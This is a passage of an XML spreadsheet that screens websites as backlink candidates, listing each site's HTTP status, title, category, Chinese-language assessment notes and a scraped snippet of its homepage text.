        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://ciba.cl</x:v>
      </x:c>
    </x:row>
    <x:row r="101">
      <x:c r="A101" s="18" t="str">
        <x:v>100</x:v>
      </x:c>
      <x:c r="B101" s="19" t="str">
        <x:v>motheroomontessori.com</x:v>
      </x:c>
      <x:c r="C101" s="19" t="str">
        <x:v>https://motheroomontessori.com</x:v>
      </x:c>
      <x:c r="D101" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E101" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F101" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G101" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H101" s="19" t="str">
        <x:v>https://expireddomains.com/domain/motheroomontessori.com?utm_source=redi</x:v>
      </x:c>
      <x:c r="I101" s="19" t="str">
        <x:v>motheroomontessori.com — seasoned .com domain (2y)</x:v>
      </x:c>
      <x:c r="J101" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K101" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L101" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M101" s="19" t="str">
        <x:v>https://expireddomains.com/domain/motheroomontessori.com?utm_source=redi</x:v>
      </x:c>
      <x:c r="N101" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O101" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P101" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q101" s="21" t="str">
        <x:v>Pick up motheroomontessori.com on ExpiredDomains.com — Afternic / GoDaddy, listed at $195, escrow-protected transfer in 24 hours. motheroomontessori.com — seasoned .com domain (2y) Listing ID · MotherooMontessori.com Home .com MotherooMontessori.com Premium domain · For sale Motheroo Montessori .com Descriptive .com domain 18 characters · 2 years old A short, memorable, established domain ready to power your brand. Backed by 1 referring domains and 2 years of online authority. Buy-it-now $195 USD Buy MotherooMontessori.com Afternic GoDaddy checkout Not interested in buying this domain? Browse relevant content instead What happens after you buy Pay Secure checkout on GoDaddy 2 Verify Ownership confirmed 3 Push Delivered within 24h GoDaddy-protected checkout Available — Premium domain Authority snapshot Sign in to view a</x:v>
      </x:c>
      <x:c r="R101" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S101" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T101" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://motheroomontessori.com</x:v>
      </x:c>
    </x:row>
    <x:row r="102">
      <x:c r="A102" s="18" t="str">
        <x:v>101</x:v>
      </x:c>
      <x:c r="B102" s="19" t="str">
        <x:v>goodreads.com</x:v>
      </x:c>
      <x:c r="C102" s="19" t="str">
        <x:v>https://goodreads.com</x:v>
      </x:c>
      <x:c r="D102" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E102" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F102" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G102" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H102" s="19" t="str">
        <x:v>https://www.goodreads.com/</x:v>
      </x:c>
      <x:c r="I102" s="19" t="str">
        <x:v>Goodreads | Meet your next favorite book</x:v>
      </x:c>
      <x:c r="J102" s="19" t="str">
        <x:v>平台/个人发布平台</x:v>
      </x:c>
      <x:c r="K102" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L102" s="19" t="str">
        <x:v>平台自建内容</x:v>
      </x:c>
      <x:c r="M102" s="19" t="str">
        <x:v>https://www.goodreads.com/</x:v>
      </x:c>
      <x:c r="N102" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O102" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P102" s="21" t="str">
        <x:v>这是内容发布或个人资料平台，不是自然获得的编辑型外链目标。</x:v>
      </x:c>
      <x:c r="Q102" s="21" t="str">
        <x:v>Find and read more books you’ll love, and keep track of the books you want to read. Be part of the world’s largest community of book lovers on Goodreads. Goodreads | Meet your next favorite book Discover &amp; read more Continue with Amazon Continue with Apple Sign up with email By creating an account, you agree to the Goodreads Terms of Service and Privacy Policy . Already a member? Sign In Deciding what to read next? You’re in the right place. Tell us what titles or genres you’ve enjoyed in the past, and we’ll give you surprisingly insightful recommendations. What are your friends reading? Chances are your friends are discussing their favorite (and least favorite) books on Goodreads. What will you discover? Because ♥Meagan♥ liked&amp;hellip; She discovered: Science Fiction, Dystopia Because Deborah liked&amp;hellip; She discovered: Nonfiction, History </x:v>
      </x:c>
      <x:c r="R102" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S102" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T102" s="21" t="str">
        <x:v>不能把平台自身的用户页面当成高质量目录外链。 | 请求: https://goodreads.com</x:v>
      </x:c>
    </x:row>
    <x:row r="103">
      <x:c r="A103" s="18" t="str">
        <x:v>102</x:v>
      </x:c>
      <x:c r="B103" s="19" t="str">
        <x:v>qualitycareforchildren.org</x:v>
      </x:c>
      <x:c r="C103" s="19" t="str">
        <x:v>https://qualitycareforchildren.org</x:v>
      </x:c>
      <x:c r="D103" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E103" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F103" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G103" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H103" s="19" t="str">
        <x:v>https://www.qualitycareforchildren.org/</x:v>
      </x:c>
      <x:c r="I103" s="19" t="str">
        <x:v>Quality Care for Children</x:v>
      </x:c>
      <x:c r="J103" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K103" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L103" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M103" s="19" t="str">
        <x:v>https://www.qualitycareforchildren.org/</x:v>
      </x:c>
      <x:c r="N103" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O103" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P103" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q103" s="21" t="str">
        <x:v>Quality Care for Children is dedicated to enhancing the lives of Georgia Quality Care for Children 0 Skip to Content About Overview Our impact News and resources Careers Providers Starting a child care business Improving quality of care Operating efficiently Parents Finding and affording child care Raising a happy and healthy child English Contact us Open Menu Close Menu About Overview Our impact News and resources Careers Providers Starting a child care business Improving quality of care Operating efficiently Parents Finding and affording child care Raising a happy and healthy child English Contact us Open Menu Close Menu Folder: About Back Overview Our impact News and resources Careers Folder: Providers Back Starting a child care business Improving quality of c</x:v>
      </x:c>
      <x:c r="R103" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S103" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T103" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://qualitycareforchildren.org</x:v>
      </x:c>
    </x:row>
    <x:row r="104">
      <x:c r="A104" s="18" t="str">
        <x:v>103</x:v>
      </x:c>
      <x:c r="B104" s="19" t="str">
        <x:v>happinessishomemade.net</x:v>
      </x:c>
      <x:c r="C104" s="19" t="str">
        <x:v>https://happinessishomemade.net</x:v>
      </x:c>
      <x:c r="D104" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E104" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F104" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G104" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H104" s="19" t="str">
        <x:v>https://happinessishomemade.net/</x:v>
      </x:c>
      <x:c r="I104" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J104" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K104" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L104" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M104" s="19" t="str">
        <x:v>https://happinessishomemade.net/</x:v>
      </x:c>
      <x:c r="N104" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O104" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P104" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q104" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R104" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S104" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T104" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://happinessishomemade.net</x:v>
      </x:c>
    </x:row>
    <x:row r="105">
      <x:c r="A105" s="18" t="str">
        <x:v>104</x:v>
      </x:c>
      <x:c r="B105" s="19" t="str">
        <x:v>playvolutionhq.com</x:v>
      </x:c>
      <x:c r="C105" s="19" t="str">
        <x:v>https://playvolutionhq.com</x:v>
      </x:c>
      <x:c r="D105" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E105" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F105" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G105" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H105" s="19" t="str">
        <x:v>https://playvolutionhq.com/</x:v>
      </x:c>
      <x:c r="I105" s="19" t="str">
        <x:v>Playvolution HQ | Early Learning Resources For Parent And Professional Caregivers</x:v>
      </x:c>
      <x:c r="J105" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K105" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L105" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M105" s="19" t="str">
        <x:v>https://playvolutionhq.com/</x:v>
      </x:c>
      <x:c r="N105" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O105" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P105" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q105" s="21" t="str">
        <x:v>Early Learning Resources For Parent And Professional Caregivers Playvolution HQ | Early Learning Resources For Parent And Professional Caregivers Playvolution HQ Early Learning Resources For Parent And Professional Caregivers Play Types Of Play Loose Parts Play Risky Play Rough-And-Tumble Play Outdoor Play Power Play Death Play Block Play Play Articles Play Sightings Play Space Critiques Classic Kid Games Supporting Play Loose Parts Ideas Tiny Loose Parts Medium Loose Parts Small Loose Parts Large Loose Parts Jumbo Loose Parts Mixed-Size Loose Parts Schema Play Types Of Schema Play Loose Parts That Support Schemas Learning Early Learning Glossary Brains Development Language And Literacy People Types Of Play Terms Of Art Schema Play Programming Terms Deve</x:v>
      </x:c>
      <x:c r="R105" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S105" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T105" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://playvolutionhq.com</x:v>
      </x:c>
    </x:row>
    <x:row r="106">
      <x:c r="A106" s="18" t="str">
        <x:v>105</x:v>
      </x:c>
      <x:c r="B106" s="19" t="str">
        <x:v>celebrateplay.com.au</x:v>
      </x:c>
      <x:c r="C106" s="19" t="str">
        <x:v>https://celebrateplay.com.au</x:v>
      </x:c>
      <x:c r="D106" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E106" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F106" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G106" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H106" s="19" t="str">
        <x:v>https://celebrateplay.com.au/</x:v>
      </x:c>
      <x:c r="I106" s="19" t="str">
        <x:v>HOME NEW PAGE - celebratePLAY</x:v>
      </x:c>
      <x:c r="J106" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K106" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L106" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M106" s="19" t="str">
        <x:v>https://celebrateplay.com.au/</x:v>
      </x:c>
      <x:c r="N106" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O106" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P106" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q106" s="21" t="str">
        <x:v>HOME NEW PAGE - celebratePLAY Explore The Calm Collection Facebook Instagram 0 Items HOME SPOT THE SHIFT THE CALM PLAY METHOD 4PM TODDLER RESET 1:1 DM Coaching Select Page Meaningful play. Less pressure. More Calm. Helping toddler mums create simple, meaningful play that keeps little hands busy and fits into real life – using what you already have, without complicated setups or constantly buying something new. Start with Spot the Shift - it's free Start with Spot the Shift - it's free Why 4pm doesn't have to feel so hard. Toddlers rarely go from calm to overwhelmed in an instant. They spend hours giving tiny clues. Most mums simply haven’t been shown what those clues look like. That’s what I</x:v>
      </x:c>
      <x:c r="R106" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S106" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T106" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://celebrateplay.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="107">
      <x:c r="A107" s="18" t="str">
        <x:v>106</x:v>
      </x:c>
      <x:c r="B107" s="19" t="str">
        <x:v>copymethat.com</x:v>
      </x:c>
      <x:c r="C107" s="19" t="str">
        <x:v>https://copymethat.com</x:v>
      </x:c>
      <x:c r="D107" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E107" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="F107" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G107" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H107" s="19" t="str">
        <x:v>https://www.copymethat.com/</x:v>
      </x:c>
      <x:c r="I107" s="19" t="str">
        <x:v>Copy Me That</x:v>
      </x:c>
      <x:c r="J107" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K107" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L107" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M107" s="19" t="str">
        <x:v>https://www.copymethat.com/</x:v>
      </x:c>
      <x:c r="N107" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O107" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P107" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q107" s="21" t="str">
        <x:v>Your recipes, together forever. Copy any recipe from any website with a click. You Copy Me That There is currently an issue using Facebook to log in. Please enter your email address and we will send you a temporary password to log in using email. Submit If your account isn't associated with an email address, please contact us at hello@copymethat.com . Close ╳ show Log in Forgot Password? Or log in with Continue with Facebook Continue with Apple Don't have an account? Sign up ╳ ╳ ╳ Login Sign up Close menu ╳ show Create account By signing up, you agree to the terms Already have an account? Log in LOGIN SIGN UP RECIPE MANAGER Never lose a recipe again! Add your own recipes or copy recipes from any website. Organize with collections. Search, filter, print, scale, email, and s</x:v>
      </x:c>
      <x:c r="R107" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S107" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T107" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://copymethat.com</x:v>
      </x:c>
    </x:row>
    <x:row r="108">
      <x:c r="A108" s="18" t="str">
        <x:v>107</x:v>
      </x:c>
      <x:c r="B108" s="19" t="str">
        <x:v>cakebaking.net</x:v>
      </x:c>
      <x:c r="C108" s="19" t="str">
        <x:v>https://cakebaking.net</x:v>
      </x:c>
      <x:c r="D108" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E108" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F108" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G108" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H108" s="19" t="str">
        <x:v>https://cakebaking.net/</x:v>
      </x:c>
      <x:c r="I108" s="19" t="str">
        <x:v>Cake Baking - My Blog about cakes, recipes and baking cakes.</x:v>
      </x:c>
      <x:c r="J108" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K108" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L108" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M108" s="19" t="str">
        <x:v>https://cakebaking.net/</x:v>
      </x:c>
      <x:c r="N108" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O108" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P108" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q108" s="21" t="str">
        <x:v>My Blog about cakes, recipes and baking cakes. Cake Baking - My Blog about cakes, recipes and baking cakes. Cake Baking Menu 45 Cake Ingredients Best Cake Baking Pans How To Start Cake Baking Business From Home Best Cake Pans For Home Baking The Ultimate Guide To Cake Baking For Beginners Why Did My Cake Fall in the Middle January 1, 2026 Recipes Why Does My Carrot Cake Fall in the Middle January 1, 2026 Cake Recipe Lining and Greasing Pans Like a Pro: The Ultimate Guide April 18, 2025 Cake Baking Tips Orange Zest March 21, 2025 Other Lemon Zest March 20, 2025 Other Almond Extract March 19, 2025 Other Vanilla Extract March 18, 2025 Other Chocolate March 17, 2025 Other Egg Yolks March 15, 2025 Other Egg Whites March 14, 2025 Cake Baking T</x:v>
      </x:c>
      <x:c r="R108" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S108" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T108" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cakebaking.net</x:v>
      </x:c>
    </x:row>
    <x:row r="109">
      <x:c r="A109" s="18" t="str">
        <x:v>108</x:v>
      </x:c>
      <x:c r="B109" s="19" t="str">
        <x:v>gatanippo.com</x:v>
      </x:c>
      <x:c r="C109" s="19" t="str">
        <x:v>https://gatanippo.com</x:v>
      </x:c>
      <x:c r="D109" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E109" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F109" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G109" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H109" s="19" t="str">
        <x:v>https://gatanippo.com/</x:v>
      </x:c>
      <x:c r="I109" s="19" t="str">
        <x:v>Swaffic.com - Breaking Through the Noise Daily</x:v>
      </x:c>
      <x:c r="J109" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K109" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L109" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M109" s="19" t="str">
        <x:v>https://gatanippo.com/</x:v>
      </x:c>
      <x:c r="N109" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O109" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P109" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q109" s="21" t="str">
        <x:v>Breaking Through the Noise Daily Swaffic.com - Breaking Through the Noise Daily Skip to content Monday, August 31, 2026 Swaffic.com Breaking Through the Noise Daily Home Arts Entertainments Auto Business Cryptocurrency Digital Marketing Education Finance Gaming Health Fitness Home Kitchen Legal Law Lifestyle Fashion Medicine Pets Real Estate Relationship Shopping Product Reviews Sports Technology Tours Travel Privacy Policy Contact US Sitemap Legal Law -3 Minutes When should I contact an Office harassment lawyer? admin July 2, 2026 0 Comment on When should I contact an Office harassment lawyer? Workplace harassment can affect your confidence, mental health, and professional growth. Whether the behavior involves discriminati</x:v>
      </x:c>
      <x:c r="R109" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S109" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T109" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://gatanippo.com</x:v>
      </x:c>
    </x:row>
    <x:row r="110">
      <x:c r="A110" s="18" t="str">
        <x:v>109</x:v>
      </x:c>
      <x:c r="B110" s="19" t="str">
        <x:v>classichomeimprovements.ca</x:v>
      </x:c>
      <x:c r="C110" s="19" t="str">
        <x:v>https://classichomeimprovements.ca</x:v>
      </x:c>
      <x:c r="D110" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E110" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F110" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G110" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H110" s="19" t="str">
        <x:v>https://romack.ca/</x:v>
      </x:c>
      <x:c r="I110" s="19" t="str">
        <x:v>KARGOTOTO : Mainkan Slot 5000 Game Slot Terlengkap Jackpot Tanpa Batas</x:v>
      </x:c>
      <x:c r="J110" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K110" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L110" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M110" s="19" t="str">
        <x:v>https://romack.ca/</x:v>
      </x:c>
      <x:c r="N110" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O110" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P110" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q110" s="21" t="str">
        <x:v>KARGOTOTO menghadirkan game slot terlengkap dengan bermodalkan receh slot 5000, sistem mudah dipakai dan jackpot tanpa batas. KARGOTOTO : Mainkan Slot 5000 Game Slot Terlengkap Jackpot Tanpa Batas Cari Cuan di Google : SLOT5000 Situs Slot5000 Resmi Tentu Link Slot Gacor Hari Ini Gampang Maxwin 2026 Deposit Murah Gampang Cuan Rtp Live Slot88 Paling Update " data-search-history-clock=" " autocomplete="off" spellcheck="false" autocapitalize="off" autocorrect="off" placeholder="" tabIndex="1" /&gt; Explore Categories Popular Products SLOT5000 SLOT SLOT GACOR LINK SLOT SITUS SLOT SLOT88 SLOT GACOR HARI INI SLOT GAMPANG MENANG Design ID: 74165272 74165272 1 false 1 KARGOTOTO : Mainkan Slot 5000 Game Slot Terlengkap Jackpot Tanpa Batas $3 Rp5.000 Create an account to favorite this design! Back SLOT GACOR 2026 INFORMASI LENGK</x:v>
      </x:c>
      <x:c r="R110" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S110" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T110" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://classichomeimprovements.ca</x:v>
      </x:c>
    </x:row>
    <x:row r="111">
      <x:c r="A111" s="18" t="str">
        <x:v>110</x:v>
      </x:c>
      <x:c r="B111" s="19" t="str">
        <x:v>richlandlibrary.com</x:v>
      </x:c>
      <x:c r="C111" s="19" t="str">
        <x:v>https://richlandlibrary.com</x:v>
      </x:c>
      <x:c r="D111" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E111" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F111" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G111" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H111" s="19" t="str">
        <x:v>https://www.richlandlibrary.com/</x:v>
      </x:c>
      <x:c r="I111" s="19" t="str">
        <x:v>Richland Library</x:v>
      </x:c>
      <x:c r="J111" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K111" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L111" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M111" s="19" t="str">
        <x:v>https://www.richlandlibrary.com/</x:v>
      </x:c>
      <x:c r="N111" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O111" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P111" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q111" s="21" t="str">
        <x:v>Ebooks, movies, music, and events free for Richland Library cardholders. Attend storytime, craft lessons, and performances at any of our locations. Access freely with Richland Library. Richland Library Skip to main content Library Closings: Sun. September 6 and Mon. September 7 Expand Search Collapse Search Expand Account Collapse Account Expand Menu Collapse Menu Events Locations Get Email Updates Contact Us Library Policies &amp;copy; 2026 Richland Library, Richland County, South Carolina Search Site Select search engine Search Collection Search Site Keyword Search Events Locations Get Email Updates Contact Us Services Cardholder Services Get a Library Card Get a Recommendation Get a ConnectED Student Card Spaces &amp; Equipment Accessibility Services Reserve a Room Print Documents Creative Spaces &amp; Equipment Library of Things Community Services Request an Obituary Social Work C</x:v>
      </x:c>
      <x:c r="R111" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S111" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T111" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://richlandlibrary.com</x:v>
      </x:c>
    </x:row>
    <x:row r="112">
      <x:c r="A112" s="18" t="str">
        <x:v>111</x:v>
      </x:c>
      <x:c r="B112" s="19" t="str">
        <x:v>transparenciaypoder.mx</x:v>
      </x:c>
      <x:c r="C112" s="19" t="str">
        <x:v>https://transparenciaypoder.mx</x:v>
      </x:c>
      <x:c r="D112" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E112" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F112" s="20"/>
      <x:c r="G112" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H112" s="19" t="str"/>
      <x:c r="I112" s="19" t="str"/>
      <x:c r="J112" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K112" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L112" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M112" s="19" t="str">
        <x:v>https://transparenciaypoder.mx</x:v>
      </x:c>
      <x:c r="N112" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O112" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P112" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q112" s="21" t="str"/>
      <x:c r="R112" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S112" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T112" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://transparenciaypoder.mx
http://transparenciaypoder.mx</x:v>
      </x:c>
    </x:row>
    <x:row r="113">
      <x:c r="A113" s="18" t="str">
        <x:v>112</x:v>
      </x:c>
      <x:c r="B113" s="19" t="str">
        <x:v>barleyandbirch.com</x:v>
      </x:c>
      <x:c r="C113" s="19" t="str">
        <x:v>https://barleyandbirch.com</x:v>
      </x:c>
      <x:c r="D113" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E113" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F113" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G113" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H113" s="19" t="str">
        <x:v>https://barleyandbirch.com/</x:v>
      </x:c>
      <x:c r="I113" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
